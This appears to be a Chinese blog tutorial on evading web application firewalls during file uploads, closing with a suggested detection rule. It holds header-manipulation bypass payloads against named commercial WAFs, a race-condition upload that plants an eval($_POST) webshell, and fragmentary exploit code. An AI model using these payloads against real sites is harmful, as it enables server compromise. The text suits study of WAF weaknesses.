前言
本文主要讨论下 文件上传和WAF的功与防。
测试环境均为
- nginx/1.10.3
- PHP 5.5.34
有些特性和 语言及webserver有关,有问题的地方,欢迎大家指正。
文件上传的特征
先来了解下文件上传的特征,抓包看看这段文件上传代码的HTTP请求。
upload.php
1 |
|
1 | <html> |
请求
1 | POST /upload.php HTTP/1.1 |
从中获取特征为:
- 请求Header中Content-Type存在以下特征:
- multipart/form-data(表示该请求是一个文件上传请求)
- 存在boundary字符串(作用为分隔符,以区分POST数据)
- POST的内容存在以下特征:
- Content-Disposition
- name
- filename
- POST中的boundary的值就是Content-Type的值在最前面加了两个--,除了最后标识结束的boundary
- 最后标识结束的boundary最后默认会多出两个--(测试时,最后一行的boundary删掉也能成功上传)
WAF如何拦截
先来想想,如果自己写WAF来防御恶意文件上传。你应该如何防御?
- 文件名
- 解析文件名,判断是否在黑名单内。
- 文件内容
- 解析文件内容,判断是否为webshell。
- 文件目录权限
- 该功能需要主机WAF实现,比如我见过的云锁。
目前,市面上常见的是解析文件名,少数WAF是解析文件内容,比如长亭。下面内容,都是基于文件名解析。
大致步骤如下:
- 获取Request Header里的Content-Type值中获取boundary值
- 根据第一步的boundary值,解析POST数据,获取文件名
- 判断文件名是否在拦截黑名单内
看看春哥写的lua-resty-multipart-parser,就能理解了,不过这份代码已经没维护了。但是这份代码解析了文件名,只是绕过方式比较多233。看到这份解析代码是由于某个WAF使用的这份代码,具体这WAF叫什么名字,现在找不到了,不过github上搜下应该就出来了。
lua-resty-upload这份代码还在维护,不过只是取了内容,文件名需要自己解析。
1 | ------WebKitFormBoundaryj1oRYFW91eaj8Ex2 |
绕过
获取文件名的地方在Content-Disposition: form-data; name="file_x"; filename="xx.php"和Content-Type里,所以绕过的地方也就在这两个地方了。
去掉引号
1 | Content-Disposition: form-data; name=file_x; filename="xx.php" |
双引号变成单引号
1 | Content-Disposition: form-data; name='file_x'; filename='xx.php' |
单引号、双引号、不要引号,都能上传。
大小写
对这三个固定的字符串进行大小写转换
- Content-Disposition
- name
- filename
比如name转换成Name,Content-Disposition转换成content-disposition。两年前,拿它绕过安全狗的上传,不知道现在如何。
空格
Content-Disposition: form-data; name=file_x; filename=xx.php
在: ; =添加1个或者多个空格,不过测试只有filename在=前面添加空格,上传失败。
在filename=后面添加空格,截止到2017年10月04日还能绕过某盾WAF。
去掉或修改Content-Disposition值
有的WAF在解析的时候,认为Content-Disposition值一定是form-data,造成绕过。两年前,拿它绕过安全狗的上传,不知道现在如何。
Content-Disposition: name='file_x'; filename='xx.php'
交换name和filename的顺序
规定Content-Disposition必须在最前面,所以只能交换name和filename的顺序。
有的WAF可能会匹配name在前面,filename在后面,所以下面姿势会导致Bypass。
1 | Content-Disposition: form-data; filename="xx.php"; name=file_x |
多个boundary
最后上传的文件是test.php而非test.txt,但是取的文件名只取了第一个就会被Bypass。
1 | ------WebKitFormBoundaryj1oRYFW91eaj8Ex2 |
多个filename
最终上传成功的文件名是test.php。但是由于解析文件名时,会解析到第一个。正则默认都会匹配到第一个。
1 | Content-Disposition: form-data; name="file_x"; filename="test.txt"; filename="test.php" |
多个分号
文件解析时,可能解析不到文件名,导致绕过。
1 | Content-Disposition: form-data; name="file_x";;; filename="test.php" |
multipart/form-DATA
这种绕过应该很少,大多数都会忽略大小写。php和java都支持。
1 | Content-Type: multipart/form-DATA |
Header在boundary前添加任意字符
这个只能说,PHP很皮,这都支持。试了JAVA会报错。
1 | Content-Type: multipart/form-data; bypassboundary=----WebKitFormBoundaryj1oRYFW91eaj8Ex2 |
filename换行
PHP支持,Java不支持。截止到2017年10月18日,这个方法能绕过某盾。
Content-Disposition: form-data; name="file_x"; file
name="test.php"
这种PHP也支持。
1 | fi |
name和filename添加任意字符串
PHP上传成功,Java上传失败。
1 | Content-Disposition: name="file_x"; bypass waf upload; filename="test.php"; |
其他
其他利用系统特性的就不描述了,不是本文重点。有兴趣可以看下我的Waf Bypass之道(upload篇)
案例绕过
某盾
测试某盾WAF对恶意文件上传的拦截。方法比较粗暴,判断如下:
- 判断POST数据是否存在Content-Disposition:字符串
- 判断filename的文件名是否在黑名单内
两者满足就拦截,没有做其他多余的判断,正则也很好写。
测试:curl -v -d "Content-Disposition:filename=xx.php;" www.victim.com 拦截
这种方式确实有误拦截情况。不过截止到2017年10月04日,某盾的上传还是能够通过在filename=后面添加空格进行绕过。
1 | POC:Content-Disposition: form-data; name="file_x"; filename= "xx.php"; |
下面这种也能绕过。
1 | Content-Disposition: form-data; name="file_x"; file |
UCloud
先找一个用了UCloud WAF的网站测试。
拦截
1 | Content-Disposition: form-data; name="file_x";filename="xx.php" |
去掉form-data绕过
1 | Content-Disposition: name="file_x";filename="xx.php" |
其他的就不测试了…
竞争上传
演示代码:
1 |
|
首先将文件上传到服务器,然后检测文件后缀名,如果不符合条件,就删掉,我们的利用思路是这样的,首先上传一个php文件,内容为:
copy.php
1 | "./info.php", "w"), '<?php @eval($_POST["drops"]) ?>'); fputs(fopen( |
当然这个文件会被立马删掉,所以我们使用多线程并发的访问上传的文件,总会有一次在上传文件到删除文件这个时间段内访问到上传的php文件,一旦我们成功访问到了上传的文件,那么它就会向服务器写一个shell。利用代码如下:
1 | import os |
经过几次尝试后成功成功写入shell
How to Play
看了这么多,那规则到底应该如何写。我个人想法如下:
- 由于是文件上传,所以必须有Content-Type: multipart/form-data,先判断这个是否存在。
- POST数据去掉所有换行,匹配是否有
Content-Disposition:.*filename\s*=\s*(.*php)
类似的规则。
这只是我的个人想法,如果有更好的想法,欢迎交流讨论。